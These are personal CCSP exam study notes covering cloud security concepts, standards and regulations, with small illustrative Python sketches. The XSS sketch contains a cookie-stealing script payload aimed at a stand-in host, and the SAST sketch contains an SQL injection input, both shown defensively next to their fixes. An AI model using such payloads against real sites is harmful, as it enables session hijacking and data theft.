CCSP Study


REST vs SOAP (both are used to build APIs, but from a technical standpoint neither is itself an API)

*****Representational State Transfer (REST)*****
>> REST is not a protocol; it is a set of architectural constraints.
>> Supports caching, encryption, redundancy, and monitoring.
>> Lightweight; ideal for IoT, mobile applications, and serverless computing.
>> XML and JSON are the two most popular REST formats.
>> REST is URI based (see URL vs URI).
========================
*****Simple Object Access Protocol (SOAP)*****
* SOAP is not an API; it is a protocol, and it can be used in an API. APIs that encapsulate SOAP use it for transferring messages and are often referred to as SOAP APIs, which is why SOAP is sometimes mistaken for an API.
* Older and slower; does not support caching.
* Offers built-in security and transaction compliance that align with many enterprise needs, which makes it heavier.
* Supports only XML-formatted data.
SOAP, by itself, is not secure; >>>TLS/SSL<<< must be used during transfer. Because SOAP can use a variety of transports, a common encryption method that does not depend on the transport protocol was designed: Web Services Security (WS-Security or WSS), which can encrypt any specified portion of an XML payload. WSS is an extension of SOAP, which is an XML-based protocol for accessing web services. WSS provides the ability to digitally sign and/or encrypt the XML content. WSS supports various security token formats, including SAML, Kerberos tickets, and X.509 certificates. WSS is not itself a method for encrypting XML messages; rather, XML has its own encryption and signature functionalities, and WSS uses them.
API - application programming interface.
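To make the stylistic difference concrete, here is a minimal Python sketch contrasting a REST request (resource-addressed URI, JSON over standard HTTP verbs) with a SOAP message (single endpoint, operation wrapped in an XML envelope). The endpoint URL, operation name, and fields are hypothetical, not any real service.

```python
# Minimal sketch contrasting REST and SOAP request styles.
# The endpoint URLs and payload fields below are illustrative, not real services.
import urllib.request

# REST: resource-oriented URI, JSON representation, standard HTTP verbs.
rest_request = urllib.request.Request(
    url="https://api.example.com/customers/42",   # the URI identifies the resource
    headers={"Accept": "application/json"},
    method="GET",
)

# SOAP: one service endpoint; the operation lives inside an XML envelope.
soap_envelope = """<?xml version="1.0"?>
<soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope">
  <soap:Body>
    <GetCustomer xmlns="http://example.com/customers">
      <Id>42</Id>
    </GetCustomer>
  </soap:Body>
</soap:Envelope>"""

print(rest_request.full_url)   # request is only constructed here, not sent
print(soap_envelope)
```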

PCI DSS requirements

1. Build and maintain a firewall
2. Do not use vendor-supplied defaults
3. Protect stored cardholder data; never store the CVV
4. Encrypt transmission of cardholder data over public networks
5. Use regularly updated anti-virus software
6. Develop and maintain secure systems and applications
7. Restrict access to cardholder data on a need-to-know basis
8. Use a unique user ID for everyone who has access to the data
9. Restrict physical access to cardholder data
10. Track and monitor all access to network resources and cardholder data
11. Regularly test security systems and processes
12. Maintain a policy that addresses information security for all personnel

Cloud Building Blocks

1. CPU
2. RAM
3. Storage
4. Networking
Example: a virtual machine is not a cloud building block, because a VM itself consists of CPU, RAM, and storage and must always be connected to a virtual network.
P.S.: IaaS exposes the most fundamental building blocks compared to the other two service models.

FISMA

Federal Information Security Management Act. The U.S. Federal Government requires that all U.S. Government agencies conduct risk assessments that align with the NIST RMF.

Risk Assessment Procedures

1. Identification
2. Analysis
3. Evaluation
4. Treatment
Terms:
Asset - something of value
Threat - harm that can occur to an asset, impacting CIA
Vulnerability - a weakness or flaw; it must be exploitable
Impact - the extent of the damage caused by the threat being exploited
Attack/Exploit - the actual exploitation; it takes the threat from a theoretical topic to a real one
Likelihood - the chance that this attack is possible
Risk - the combination of likelihood and impact
Control - knowing that specific exploits are possible, we do things to reduce the likelihood or the impact
Safeguard - works to reduce the chance of the attack occurring
Countermeasure - a type of control we put in place to reduce the impact of the attack

Lines of Defense

1. Infosec Department 2. Risk Management Team 3. Internal Audit

Basic Forensics Rules

1. Never do this unless you are trained and, in some places, certified
2. Follow all legal rules, such as chain of custody
3. Use only approved tools that are acceptable in your court system
4. Assume you are going to court and will have to testify
5. Document exactly what is done in the collection and examination process

ISO/IEC

11889 - Trusted Platform Module
12207 - Software development life cycle (SDLC)
17788 - Cloud computing overview and vocabulary
17789 - Cloud computing reference architecture (cloud roles)
19011 - Guidelines for auditing management systems
15408 - Common Criteria
27001 - ISMS requirements
27002 - Code of practice for information security controls (supports the ISMS)
27005 - Information security risk management
27017 - Cloud infrastructure security
27018 - Protecting PII in the cloud
27034 - Secure application software development
27036 - Supplier relationships
27037 - Identification, collection, acquisition, and preservation of digital evidence
27050 - eDiscovery
31000 - Risk management (compare NIST 800-37 RMF)

FIPS 140-2

A NIST standard that specifies security requirements for cryptographic modules and defines four security levels.
Level 1 provides the lowest level of security.
Level 2 requires features that show evidence of tampering.
Level 3 zeroizes all plaintext CSPs (critical security parameters) when the removable covers/doors of the cryptographic module are opened.
Level 4 protects a cryptographic module against a security compromise due to environmental conditions or fluctuations outside of the module's normal operating ranges for voltage and temperature.

XSS (Cross Site Scripting)

A malicious script hosted on the attacker's site, or coded into a link injected onto a trusted site, designed to compromise clients browsing the trusted site by circumventing the browser's security model of trusted zones. XSS allows an attacker to inject a malicious script into an application; when a victim navigates to the compromised application, the script runs in their web browser with the browser's permissions.
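A minimal sketch of why output encoding matters: the comment string below is a hypothetical attacker-supplied input, not taken from any real application. Rendered unescaped it would execute in the victim's browser; html.escape() renders it as inert text.

```python
# Sketch: reflecting user input without encoding enables XSS;
# html.escape() neutralizes the script tags.
import html

comment = '<script>document.location="https://evil.example/?c="+document.cookie</script>'

unsafe_page = f"<p>User said: {comment}</p>"             # script would execute in the browser
safe_page = f"<p>User said: {html.escape(comment)}</p>"  # rendered as harmless text

print(unsafe_page)
print(safe_page)
```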

DNSSEC (Domain Name System Security Extensions)

A suite of specifications used to protect the integrity of DNS records and prevent DNS poisoning (spoofing) attacks. DNSSEC protects the integrity of DNS data by using digital signatures. DNSSEC validation must be enabled on DNS clients, and DNSSEC zones must be digitally signed. DNSSEC does not require changes to any application; for a DNS zone to be protected, the zone and its records must be digitally signed. The public keys that correspond to the private keys used for signing are known as trust anchors.

Administrative, Technical, and Physical Control

Administrative controls are measures that target personnel and are intended to enforce or promote certain types of human behavior. Examples of administrative controls are conducting regular security training for personnel and performing background checks on prospective and current employees. Technical controls are controls implemented through technology (hardware or software), as opposed to physical or administrative measures. Physical controls include various physical obstacles that hinder or prevent unwanted behavior. For example, a company can have checkpoints throughout its premises so that only authorized personnel can get into certain areas; the restrictions can be enforced by requiring employees' access cards. Server racks can be locked in cases in order to prevent physical access to them for everyone except a small group of IT administrators.

Agentless

Agentless backups generally interact directly with your hypervisor to snapshot and back up VMs.

ASHRAE

American Society of Heating, Refrigerating and Air-Conditioning Engineers.
Ideal data center temperature: 64.4-80.6 °F
Ideal data center relative humidity: 40-60%

Orchestration vs Automation

Orchestration involves integrating automated tasks between systems and services to create an automated workflow that accomplishes things like provisioning and allocation. Automation targets manual tasks, whereas orchestration targets automated tasks: you cannot orchestrate tasks that are performed manually, and you cannot automate tasks that are already performed automatically.

RMF

According to NIST 800-37 (Risk Management Framework):
1. Prepare
2. Categorize
3. Select
4. Implement
5. Assess
6. Authorize
7. Monitor (continuous monitoring)
According to the CCSP All-in-One Exam Guide: before any risks can be managed, they must be identified. This is unique to each company and also depends on management's decision as to the types and levels of risk that it chooses to consider. The first step after that is to perform an assessment of the selected risks. Depending on the company's level of resources and skills, risk assessments can be qualitative or quantitative. The former is purely verbal and is based on the review of documentation and interviews with the relevant personnel. The latter is more sophisticated and involves calculating numeric metrics, typically in monetary terms.

Apache CloudStack

An open source cloud computing and Infrastructure as a Service (IaaS) platform developed to make creating, deploying, and managing cloud services easier by providing a complete "stack" of features and components for cloud environments.

Anonymization

Anonymization is an obfuscation technique that involves making the target data anonymous, for example by removing or hiding all direct and indirect identifiers.

API Gateway

Applications communicate with each other mostly by using sets of conventions known as application programming interfaces (APIs). APIs are ubiquitous; all cloud services are ultimately accessed through APIs. If a company has many services or applications that are accessed through APIs, all those APIs need certain common functionalities, such as authentication, bandwidth throttling, rate limiting, autoscaling, usage monitoring, caching, and TLS termination. Rather than including all those features in each API, it is more efficient to include them in a single front-end point, known as an API gateway, that acts as a reverse proxy between clients and the destination APIs. An API gateway helps simplify client applications because, instead of learning the different details of accessing a multitude of individual APIs, programmers can access them in a standardized manner via the gateway. An API gateway also enables you to make changes to applications and services without affecting the way clients access them.
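As an illustration of one gateway concern, here is a minimal Python sketch of token-bucket rate limiting in front of a simulated backend; the paths and rates are made up, and real gateways layer on authentication, caching, TLS termination, and more.

```python
# Sketch of one API-gateway concern -- rate limiting -- using a simple token bucket.
# The backend call is simulated; real gateways add auth, caching, TLS termination, etc.
import time

class TokenBucket:
    def __init__(self, rate_per_sec: float, capacity: int):
        self.rate = rate_per_sec
        self.capacity = capacity
        self.tokens = float(capacity)
        self.last = time.monotonic()

    def allow(self) -> bool:
        now = time.monotonic()
        # Refill tokens in proportion to elapsed time, capped at capacity.
        self.tokens = min(self.capacity, self.tokens + (now - self.last) * self.rate)
        self.last = now
        if self.tokens >= 1:
            self.tokens -= 1
            return True
        return False

bucket = TokenBucket(rate_per_sec=2, capacity=2)

def gateway(request_path: str) -> str:
    if not bucket.allow():
        return "429 Too Many Requests"
    return f"200 OK (forwarded {request_path} to backend)"  # reverse-proxy step, simulated

for i in range(5):
    print(gateway(f"/orders/{i}"))
```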

DATA States

At rest In Transit In use

Geotargeting vs Geofencing

Geotargeting is based on the user's IP address and is typically used for marketing purposes. Geofencing is based on the user's GPS location; it is more accurate than geotargeting.

GRC

Governance, Risk, and Compliance. Governance: the corporate strategy leads to the governance structure of the business. The governance of the business should be used to create the security governance.

BICSI (Building Industry Consulting Service International)

BICSI has published data center cabling standards. BICSI is a professional organization for IT and telecommunications specialists. It promotes technical education and training and publishes best-practice recommendations and standards pertaining to computing, telecommunications, and data center design.

Brewer-Nash

Chinese Wall Brewer-Nash is an information flow model designed to prevent conflicts of interest in processing business data.

Bidirectional Process

A bidirectional process is meant to create a continuous improvement loop.

CASB (Shadow IT)

Cloud Access Security Broker. There are three types:
1. API-based control - offers visibility into data and threats in the cloud, quick deployment, and comprehensive coverage.
2. Reverse proxy - ideal for devices generally outside the purview of network security.
3. Forward proxy - usually works in conjunction with VPN clients or endpoint protection.
A CASB is a third-party entity offering independent identity and access management (IAM) services to CSPs and cloud customers. This can take the form of a variety of services, including SSO, certificate management, and cryptographic key escrow. A CASB does not provide BCDR. For anything related to visibility into cloud usage (shadow IT), CASB is pretty much the answer.

Cloud Computing (Continue)

Cloud computing is a model for enabling ubiquitous, convenient, on-demand network access to a shared pool of configurable computing resources (e.g., networks, servers, storage, applications, and services) that can be rapidly provisioned and released with minimal management effort or service provider interaction. This cloud model is composed of five essential characteristics, three service models, and four deployment models.
Characteristics (5):
1. On-demand self-service: get what you need without interacting with a human.
2. Broad network access: accessible over the network/Internet.
3. Resource pooling: multiple consumers share resources (multi-tenant model).
4. Rapid elasticity: capabilities can be elastically provisioned and released to scale rapidly when needed.
5. Measured service: pay for what you use, no more and no less; control and optimize resource use by leveraging a metering capability at some level of abstraction appropriate to the type of service.
Service models (3):
SaaS: provides applications running on cloud infrastructure, accessible via the web or an API. The consumer does not manage or control the underlying cloud infrastructure, including network, servers, operating systems, storage, or even individual application capabilities, with the possible exception of limited user-specific application configuration settings. In SaaS, the provider supplies a fully functional application and customers connect to it over the Internet by using a web browser or a specialized thin client. The application runs on the provider's infrastructure, and the provider is responsible for controlling and managing that infrastructure as well as for configuring the main features of the application. You must purchase licenses for the application and assign them to your users, thereby effectively controlling user access to the application. Depending on the specific application, you might be able to configure some branding for your users, and users can typically configure some minor customizations. Apart from that, you will have virtually no control over the application. You will still be responsible, though, for the data that your users create, store, or process by using the application.
PaaS: provides programming languages, libraries, services, and tools supported by the provider. The consumer does not manage or control the underlying cloud infrastructure, including network, servers, operating systems, or storage, but has control over the deployed applications and possibly configuration settings for the application-hosting environment. PaaS is suitable for software development and testing; more broadly, PaaS is intended for deploying and running various types of software.
IaaS: service management and CDN belong here. The capability provided to the consumer is to provision processing, storage, networks, and other fundamental computing resources where the consumer is able to deploy and run arbitrary software, which can include operating systems and applications. The consumer does not manage or control the underlying cloud infrastructure but has control over operating systems, storage, and deployed applications, and possibly limited control of select networking components (e.g., host firewalls).
Deployment models (4):
1. Private cloud: the cloud infrastructure is provisioned for exclusive use by a single organization comprising multiple consumers (e.g., business units). It may be owned, managed, and operated by the organization, a third party, or some combination of them, and it may exist on or off premises.
2. Community cloud: the cloud infrastructure is provisioned for exclusive use by a specific community of consumers from organizations that have shared concerns (e.g., mission, security requirements, policy, and compliance considerations). It may be owned, managed, and operated by one or more of the organizations in the community, a third party, or some combination of them, and it may exist on or off premises.
3. Public cloud: the cloud infrastructure is provisioned for open use by the general public. It may be owned, managed, and operated by a business, academic, or government organization, or some combination of them. It exists on the premises of the cloud provider.
4. Hybrid cloud: the cloud infrastructure is a composition of two or more distinct cloud infrastructures (private, community, or public) that remain unique entities but are bound together by standardized or proprietary technology that enables data and application portability (e.g., cloud bursting for load balancing between clouds).

Where would you install a DLP application to monitor data-in-use? A. On an application server B. At the network perimeter C. On a database server D. On a user's mobile device

Host-based DLP sits on an endpoint and monitors all data in use on the device, so the user's mobile device (answer D) is correct. Servers require monitoring of data at rest. Network-based DLP can be used to monitor traffic at the network perimeter.

Hyper-jacking and Breakout Attack

Hyper-jacking is an attack that compromises a hypervisor and allows the attacker to use it maliciously. A breakout attack is when one tenant is able to manipulate the hypervisor to gain access to another tenant's data.

IRM VS DLP

IRM allows you to remotely manage users and the level of permissions they have to access and manipulate information. DLP can be used to prevent data leakage but cannot prevent modification.

Common Criteria EAL (Evaluation Assurance Level)

ISO/IEC 15408
EAL1: Functionally tested
EAL2: Structurally tested
EAL3: Methodically tested and checked
EAL4: Methodically designed, tested, and reviewed
EAL5: Semi-formally designed and tested
EAL6: Semi-formally verified design and tested
EAL7: Formally verified design and tested

CASB vs Inter-Cloud service Provider

A CASB (a cloud service partner, CSN) provides identity and access management services to CSPs and cloud customers. This can take the form of various services, including SSO, certificate management, and cryptographic key escrow. An inter-cloud service provider (a CSP) provides Federated Identity Management (FIM), a technology that facilitates access to resources across organizational boundaries.

DLP

Core stages: 1. Classification 2. Monitoring 3. Enforcement
DLP can decrypt encrypted traffic.
DLP is a collection of techniques and technologies intended to prevent or minimize the chance of data losses caused by human errors and malicious actions. DLP is supposed to monitor the use of the specified data and prevent the specified types of actions on that data.
In transit is where the data is being transmitted over a network. If the destination is within your company's network, DLP usually doesn't need to be involved; leaks usually occur when the destination is outside your network. Therefore, part of a DLP solution is usually to monitor outbound, or egress, network traffic. Such traffic is very likely to be encrypted, so to be able to monitor it, the DLP solution must be able to decrypt it; otherwise, it would not be able to detect the presence of the data whose use it is supposed to monitor in the egress traffic. Re-encryption may not necessarily be done by the same DLP component that decrypted the traffic, and it might not be required at all, because DLP might be processing a forked copy of the outbound stream. It all depends on the specific implementation.
DLP is supposed to monitor the use of sensitive data and take action in accordance with your company's relevant policies. The actions can include notifications, alerts, and blocking certain types of activities. For all this to work, a DLP solution must know which data is to be targeted. To that end, all the data in your company's possession needs to be discovered and then classified, or categorized. DLP is supposed to be configured to target the data with specific classifications, such as sensitive, confidential, or critical. Thus data discovery and data classification constitute the first stage of a DLP solution. Once you have identified the target data, you can implement monitoring of the use of that data; monitoring occurs in the second stage. When a DLP solution, in the course of its monitoring, detects a violation of the specified policies, the solution enforces the policy and takes the action or actions in accordance with the relevant policy.
In summary: 1. Data discovery 2. Data classification/categorization 3. Monitoring 4. Enforcement
Installing a component of a DLP solution on client computers is typically done in order to protect data in use. For protecting data at rest, you would usually need to deploy a DLP solution to the computers that either host the target data or at least control access to it. For data in transit, you would usually need to implement a DLP solution at the perimeter of your company's network, on a firewall, a proxy server, or another similar host.
Shared is a data lifecycle phase when data is sent out of its original environment to an outside consumer. Once the data is outside your system, the only way it can be protected is if a protection mechanism is incorporated into the data itself.
DLP solutions are supposed to prevent primarily "honest mistakes" such as accidental deletions or inadvertent disclosure via electronic means. Implementing a DLP solution can help your company comply with regulations and also demonstrate its due diligence. DLP is unlikely to be able to prevent a user from taking a screenshot and then passing the image on to an intended recipient; thus DLP is not specifically intended to prevent malicious disclosure.
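A toy sketch of the monitoring/enforcement idea: scan outbound text for values that look like payment card numbers and block the transfer. The regex and Luhn check are deliberately simplified; real DLP engines use far richer classifiers and policies.

```python
# Sketch of DLP monitoring/enforcement: scan outbound text for data that looks
# like a payment card number and block the transfer if one is found.
import re

CARD_PATTERN = re.compile(r"\b(?:\d[ -]?){13,16}\b")

def luhn_ok(number: str) -> bool:
    digits = [int(d) for d in re.sub(r"\D", "", number)][::-1]
    total = sum(digits[0::2]) + sum(sum(divmod(d * 2, 10)) for d in digits[1::2])
    return total % 10 == 0

def egress_allowed(message: str) -> bool:
    for match in CARD_PATTERN.finditer(message):
        if luhn_ok(match.group()):
            return False          # enforcement: block and (in practice) alert
    return True

print(egress_allowed("Quarterly report attached."))           # True  (allowed)
print(egress_allowed("Customer card: 4111 1111 1111 1111"))   # False (blocked)
```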

Data Center Redundancies

External:
Power feeds/lines
Power substations
Fuel tanks for the generators
Network circuits***
Cooling/chilling infrastructure
Building access points
Fences, walls, spotlights, and other security controls at the physical perimeter
Internal:
PDUs
Power feeds to racks
Cooling and chilling units
Networking devices
Storage devices
Physical access points (to the equipment)***

SDN

Software-Defined Networking, typically found within the physical network (not virtual) at a cloud or service provider.
Broken down into:
1. Application layer
2. Control layer
3. Infrastructure (data) layer
SDN (the same principles underpin SD-WAN) is a method of managing switches within a network. It relieves the switches of the work of making forwarding decisions and places that burden on a controller node. This effectively divides a switch's work into two roles: the control plane and the data plane. The control plane allows the switch to request that a decision be made by the controller.
Software-defined network security involves virtualizing security functions away from the traditional hardware they tend to operate on. These virtual network functions are enforced with data and monitoring accessible through one intuitive interface.
Software-Defined Networking provides CSPs with holistic, centralized management across their entire network by abstracting network >>control<< from network forwarding capabilities (like routing). This creates two networking layers (control and infrastructure) rather than a single layer and allows providers to optimize network management.

DRM (Digital Rights Management) vs. IRM

Digital Rights Management is a broader field than Information Rights Management; it deals with the protection of copyrighted materials like music, movies, and other publications, whereas IRM is specifically focused on the protection of corporate data. Both DRM and IRM refer to the same technology, which provides protection for files, web pages, and other types of electronic data. Because both DRM and IRM use the same technology, either one can prevent both copying and forwarding. The protection provided by DRM is incorporated into each document and therefore persists wherever the document goes. Moreover, in contrast to the protection provided through traditional access permissions, DRM can prevent a protected document from being moved or copied from its original location, printed, or sent or forwarded by email or other means of electronic data transfer.

PII (Direct Identifiers vs Indirect Identifiers)

Direct identifiers - things that are completely unique to you (like a passport number).
Indirect identifiers - things that, on their own, cannot identify you as an individual.

Raw Storage

Enables a storage logical unit number (LUN) to be connected directly to a VM from a SAN (for example, on a VMware server).

ENISA

European Network and Information Security Agency. The ENISA Information Assurance Framework is a European, cloud-specific risk assessment framework.

IRM

Information Rights Management. IRM tools provide a continuous audit trail of access to data under their control; as such, organizations can use IRM tools to audit all data access to ensure it aligns with legal and regulatory requirements.

Metastructure

Infrastructure is the underlying physical structure, such as switches, servers, routers, etc. Meta means "above"; the word metastructure means a (virtual) structure sitting on top of the (physical) infrastructure. Everything from the hypervisor to virtual machines is found here. The metastructure enables and supports infrastructure management and configuration and is typically the line of demarcation between the cloud provider and the cloud customer.

Inter VM Attack

Inter-VM attacks are launched from one VM to another co-residing VM through shared memory, network connections, and other shared resources without compromising the hypervisor layer

iSCSI

Internet Small Computer System Interface. iSCSI enables the use of SCSI over TCP/IP networks, which enables block-level data storage over LANs, WANs, or the Internet. iSCSI supports virtualized, network-based storage in cloud environments. For iSCSI authentication, bidirectional (mutual) CHAP is the best choice.

OWASP (Open Web Application Security Project)

An online community dedicated to web application security. This community works to create freely available articles, methodologies, documentation, tools, and technologies that identify web application flaws and ways to address and correct them. They provide a Logging Cheat Sheet with useful guidelines for logging event sources, and they publish the Web Security Testing Guide (WSTG).

LUN

Logical unit number, used to identify a logical unit, often used to refer to a logical disk (Volume storage) LUN is a unique identifier that is assigned to each chunk of physical storage infrastructure (for example, each volume) that is virtually assigned to a virtual machine.

Data Masking

Masking involves replacing sensitive data with some placeholder.
Static masking: refers to a substitution that does not change; creating an alternate data set, in which all confidential data is replaced with similarly formatted mock data, and using it for testing.
Dynamic masking: refers to a substitution performed dynamically as the data travels from the back-end database to the application tier.
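A minimal sketch of static masking, assuming a hypothetical record set: the test copy keeps the shape and format of production data but swaps the confidential fields for mock values.

```python
# Sketch of static masking: build a test copy of a record set in which the
# confidential fields are replaced with similarly formatted mock values.
# The field names and records are made up for illustration.
import random

def mask_ssn(_: str) -> str:
    return f"{random.randint(100, 899):03d}-{random.randint(10, 99):02d}-{random.randint(1000, 9999):04d}"

def mask_name(_: str) -> str:
    return random.choice(["Alex Doe", "Sam Roe", "Pat Poe"])

production = [
    {"name": "Jane Smith", "ssn": "123-45-6789", "plan": "gold"},
    {"name": "John Brown", "ssn": "987-65-4321", "plan": "basic"},
]

masked_copy = [
    {**row, "name": mask_name(row["name"]), "ssn": mask_ssn(row["ssn"])}
    for row in production
]

print(masked_copy)   # same shape and format as production, no real identifiers
```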

Cloud Computing

NIST 800-145: "It is a model for enabling ubiquitous, convenient, on-demand network access to a shared pool of configurable computing resources that can be rapidly provisioned and released with minimal management effort or service provider interaction." - NIST

NIST

National Institute of Standards and Technology
800-37 - Risk Management Framework (security and privacy)
800-53 - U.S. Government security controls
800-145 - Definition of cloud computing

GDPR (General Data Protection Regulation)

A European Union law on data protection and privacy for individuals.
1. Lawfulness/fairness/transparency
2. Purpose limitation
3. Data minimization
4. Accuracy
5. Storage limitation
6. Integrity and confidentiality
7. Accountability
**GDPR does not care about availability.
***The data custodian is a primary consideration for GDPR and other privacy regulations.
GDPR was established in 2016 and went into effect in 2018. Directive 95/46/EC was passed by the European Union in 1995; it was superseded by the GDPR in 2018.

OAuth, OpenID, and WS-Federation

OAuth (Open Authorization): this is about >>authorization<<, not authentication.
Uses JSON (whereas SAML uses XML).
Uses API calls; better for mobile and IoT.
Self-encoded tokens: JSON Web Signature (JWS), JSON Web Token (JWT).
============================
OpenID: allows you to use an existing account to sign in to multiple websites without needing to create new passwords (see openid.net). OpenID Connect (OIDC) is an identity layer built on top of the OAuth 2.0 framework.
===============================
WS-Federation: an OASIS standard for authentication that results in a "security token"; championed by Microsoft. Uses SOAP and XML. WS-Federation is part of the larger WS-Security framework and an extension of the functionality of WS-Trust. The features of WS-Federation can be used directly by SOAP applications and web services. WS-Fed is a protocol that can be used to negotiate the issuance of a token.
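To show the self-encoded token idea mentioned above, here is a minimal sketch of a JWT (header.payload.signature) signed with HMAC-SHA256. The secret and claims are hypothetical, and real systems should use a maintained JWT library rather than hand-rolled code.

```python
# Sketch of the JWT structure (header.payload.signature), signed with HMAC-SHA256.
import base64
import hashlib
import hmac
import json

def b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()

secret = b"demo-shared-secret"                       # hypothetical shared secret
header = {"alg": "HS256", "typ": "JWT"}
claims = {"sub": "user-42", "scope": "read:profile", "iss": "https://idp.example"}

signing_input = f"{b64url(json.dumps(header).encode())}.{b64url(json.dumps(claims).encode())}"
signature = b64url(hmac.new(secret, signing_input.encode(), hashlib.sha256).digest())
token = f"{signing_input}.{signature}"

print(token)   # three dot-separated base64url segments, as described above
```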

SAML (Security Assertion Markup Language)

Older but still well supported within the industry today. Authentication that is XML based and results in a "token". The service provider is the destination web service that the user wants to communicate with. The service provider relies on the identity provider to authenticate the user, so it is the "relying" party. The identity provider verifies user identity through identification and authentication. The token is passed through the user's computer; therefore the client is the "relaying" party.

Threat Modeling (Done at the design phase)

PASTA (Process for Attack Simulation and Threat Analysis)
Step 1: Define the objectives
Step 2: Define the technical scope
Step 3: Decompose the application
Step 4: Analyze the threats
Step 5: Vulnerability analysis
Step 6: Attack analysis
Step 7: Risk and impact analysis
================================
STRIDE:
S - Spoofing
T - Tampering
R - Repudiation
I - Information disclosure
D - Denial of service
E - Elevation of privilege
===================================
DREAD:
D - Damage potential
R - Reproducibility
E - Exploitability
A - Affected users
D - Discoverability
===================================
Architecture, Threats, Attack Surfaces, and Mitigations (ATASM)
======================================
Threat modeling is a systematic, structured approach to identifying and mitigating possible threats to an IT environment, system, service, or application. Using threat modeling implies that you are going to analyze your targets, such as a specific system or application, and determine how they will behave if a specific threat materializes. Although all threat models are different, their main focus is the same: to make the process of identifying and mitigating threats orderly, structured, and more efficient.

PCI DSS (Payment Card Industry Data Security Standard)

PCI DSS is an information security standard for organizations that handle payment card data; it is maintained by the payment card industry (the PCI Security Standards Council), not by a government. PCI DSS is a contractual obligation, not a law.

Vendor Lock-in

Portability is the ease with which a cloud workload can move from one cloud provider to another. Vendor lock-in is, in essence, the lack of portability. It occurs when a cloud provider uses proprietary or closed technologies that make it difficult for customers to migrate their data to another cloud.

Forensic Evidence collecting in Cloud

Primary concerns:
1. Data ownership
2. Multitenancy
3. Jurisdiction
**Collecting forensic evidence in the cloud does not typically cause an operational impact.

Recovery

RPO (Recovery Point Objective): how much data loss is acceptable to an organization.
RTO (Recovery Time Objective): the duration of time without service that is acceptable to an organization.
RSL (Recovery Service Level): the percentage of total functionality that is needed during business continuity.

Application Firewall V.S regular Firewall

A regular firewall can target network traffic based on:
* Port
* IP address
* Protocol
* Layers 2, 3, and 4
An application firewall can target network traffic based on:
* Port
* IP address
* Protocol
* Behavior
* Content
Application-layer filtering is also found in IDSs, IPSs, next-generation firewalls, and web proxies.

Reservation

Reservations are the mechanism by which CSPs are able to ensure/guarantee a certain amount of resource availability to a particular customer.

SSO technologies

SAML is about Authentication OAuth is about authorization OpenID is about Identification WS-Federation

SAST vs DAST (Static/Dynamic Application Security Testing)

SAST scans the application code at rest (without execution) to discover faulty code posing a security threat. SAST is white-box testing. SAST involves reviewing source code and all the available documentation on a target application; the testing is performed statically in the sense that the application is not run.
=============================================
DAST tests the running application and has no access to its source code. DAST is black-box testing. DAST involves using the application and is performed without any prior knowledge of the application's internals; the testers do not have access to the source code, user manual, or any other documentation, and they get to know the application by trying to use it. DAST should be performed by professional testers, developers, and security experts. The flaws that may be discovered primarily depend on the skill and experience of the testers rather than on the type of testing. When an application is ready, or its development has been completed, either type of testing is possible. While the application is still in development, static testing becomes possible as soon as parts of the source code have been written, but dynamic testing cannot begin until at least some individual components have been completed.
==============================
IAST (Interactive Application Security Testing) is designed for both web and mobile applications to detect and report issues even while the application is running. IAST was developed to address the limitations that exist in both SAST and DAST; it uses a grey-box testing methodology.
==============================
RASP (Runtime Application Self-Protection) is a runtime capability integrated into an application to analyze inbound and outbound traffic and end-user behavioral patterns in order to prevent security attacks. RASP is used after product release, which makes it a more security-focused tool compared to the others, which are known for testing. RASP is deployed to a web or application server, which makes it sit next to the main application while it's running to monitor and analyze both the inbound and outbound traffic behavior.
Development (find vulnerabilities): SAST + DAST = IAST
Operations (block attacks): WAF + IDS/IPS = RASP
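A small example of the kind of flaw SAST typically flags in source code (and DAST might only find by probing the running app): SQL built by string concatenation versus a parameterized query. The table and input are made up; an in-memory SQLite database is used purely for illustration.

```python
# Sketch of a classic SAST finding: SQL injection via string concatenation,
# contrasted with the parameterized fix.
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (name TEXT, role TEXT)")
conn.execute("INSERT INTO users VALUES ('alice', 'admin'), ('bob', 'user')")

user_input = "bob' OR '1'='1"

# Vulnerable: the input is spliced into the query string.
vulnerable = conn.execute(
    "SELECT * FROM users WHERE name = '" + user_input + "'"
).fetchall()

# Fixed: the input is passed as a bound parameter.
parameterized = conn.execute(
    "SELECT * FROM users WHERE name = ?", (user_input,)
).fetchall()

print(vulnerable)      # returns every row -- the injection succeeded
print(parameterized)   # returns nothing -- no user literally has that name
```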

SOC 1, 2, & 3 (Service Organization Controls)

SOC 1 - primarily focused on an organization's management of financial records
SOC 2 - organization's security details
SOC 3 - organization's security, for the public; does not have Type 1 or Type 2
Type 1: reports evaluate a point in time
Type 2: requires a minimum of six months
The SOC framework replaced SAS 70 in 2011. SOC aligns with the standards in SSAE 18, which is governed by the American Institute of Certified Public Accountants (AICPA).
US: SAS 70 > SSAE 16 (2011) > SSAE 18 (2017)
International: ISAE 3400/3402
Trust Services Criteria:
1. Security
2. Availability
3. Processing integrity
4. Confidentiality
5. Privacy

SSO vs. Identity Federation

SSO applies to authentication within an organization; SSO is a subset of identity federation. Identity federation applies across multiple organizations. There are several implementations of Federated Identity Management (FIM):
1. OAuth
2. OpenID Connect
3. WS-Federation (Web Services Federation)
4. SAML
SAML is probably the most commonly used federation protocol. It uses an XML-based data format and can use SOAP for messaging.

SaaS, PaaS, IaaS

SaaS offers very limited access to logs. IaaS and PaaS offer the greatest access to systems, logs, and information for your development team to use.

Penetration Testing

SaaS providers generally don't allow clients to do penetration testing. Penetration testing is professional hacking to access data and computing power without being granted access; professional pen testers are hired to identify (and help repair) vulnerabilities, and they work only once given written permission to attempt otherwise ungranted access. Penetration testing can be either white-box or black-box testing, depending on how much information is provided to the testers.

SOX

Sarbanes-Oxley Act: a regulation that helps protect investors from fraudulent financial reporting by corporations. SOX is a U.S. federal law that defines the rules pertaining to the financial accountability of U.S.-based public companies. SOX is intended to provide protection for investors against deceitful accounting, which became possible because of poor oversight on the part of certain companies' boards of directors. SOX defines rules pertaining to financial transactions and is enforced by the Securities and Exchange Commission. The main issue that affects the IT side of the business is the data retention requirements specified in SOX.

ISO/IEC 27034

Secure software development. The Organizational Normative Framework (ONF) to Application Normative Framework (ANF) relationship is one-to-many: the ONF is used to create multiple ANFs.

DevSecOps

Security has become significantly more important nowadays; therefore, all security issues should be considered from the very beginning of the development process, as opposed to being added at the end of the development cycle. This newer approach in relation to DevOps is often referred to as DevSecOps: a combination of software development, security operations, and systems operations that integrates each discipline with the others.

Shares (in Cloud) vs. Reservation (in Cloud)

